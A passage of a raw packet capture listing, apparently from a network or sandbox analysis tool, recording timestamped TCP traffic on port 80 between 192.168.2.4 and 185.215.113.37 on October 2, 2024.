Oct 2, 2024 18:19:30.463213921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463226080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463232994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463253975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463275909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463535070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463551044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463567972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463581085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463596106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463598013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463609934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463624954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463634014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463651896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463660955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463669062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463684082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463697910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463701010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463710070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463713884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463730097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463743925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463758945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463758945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463773966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463782072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463788986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463800907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463804007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463814020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463819981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.463840008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.463875055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464304924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464319944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464334965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464349985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464354038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464365005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464379072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464380026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464380026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464404106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464420080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464421034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464435101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464441061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464449883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464461088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464464903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464479923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464485884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464493990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464505911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464509010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464529991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464540005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464545012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464557886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464560032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464576960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464591980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464596033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464607000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464621067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464622021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464637995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464642048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464653969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464667082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464668989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464684010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464698076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464700937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464711905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.464721918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464744091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.464771032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465069056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465086937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465100050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465120077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465132952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465146065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465234041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465250969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465265036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465276957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465280056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465286016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465295076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465310097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465325117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465339899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465342999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465342999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465363026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465378046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465389013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465389013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465393066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465404034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465409040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465421915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465451956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465451956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465451956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465467930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465480089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465481997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465498924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465512991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465517998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465528011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465536118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465543032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465558052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465563059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465573072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465579033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465588093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465600014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465603113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465617895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465626001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465632915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465641975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465652943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.465677023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.465703011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466294050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466310978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466327906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466341972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466353893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466356993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466382027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466387987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466396093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466402054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466412067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466429949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466433048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466444016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466449976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466458082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466473103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466474056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466486931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466506004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466515064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466515064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466530085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466531992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466545105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466556072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466558933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466574907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466586113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466590881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466607094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466612101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466622114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466634989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466638088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466654062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466662884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466667891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466682911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466697931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466706038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466730118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466737032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466752052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466768026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466784000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.466784000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466806889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.466835022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467004061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467058897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467149973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467166901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467180967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467196941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467211962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467212915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467226982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467242002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467257977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467272043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467286110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467299938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467317104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467318058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467318058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467318058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467318058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467324972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467341900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467355967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467366934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467366934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467372894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467406034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467411041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467411041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467421055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467422962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467436075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467451096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467470884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467474937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467489958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467499971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467506886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467516899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467523098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467538118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467546940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467551947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467557907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467567921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467578888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467581987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.467607975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.467627048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468033075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468049049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468065023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468080044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468087912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468100071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468118906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468173027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468202114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468220949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468236923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468246937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468261003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468261957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468278885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468286037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468295097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468308926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468313932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468323946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468338013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468338966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468353987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468359947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468369007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468379021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468384981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468396902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468400955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468415976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468431950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468432903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468446970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468461990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468472958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468477964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468492031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468497992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468508005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468513012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468523026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.468553066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.468580961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469096899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469113111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469127893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469142914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469158888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469166994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469185114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469191074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469199896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469208956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469216108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469230890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469244003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469244957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469259024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469273090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469274044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469283104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469304085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469320059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469321966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469336033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469350100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469352961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469366074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469382048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469384909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469398022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469414949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469415903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469429016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469438076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469455004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469504118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469528913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469544888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469561100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469568968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469578028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469593048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469592094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469608068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.469614029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469635010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469654083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.469983101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470000029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470014095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470031023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470046043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470053911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470061064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470074892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470089912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470104933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470109940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470109940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470129013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470130920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470145941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470151901 CEST	49737	80	192.168.2.4	185.215.113.37
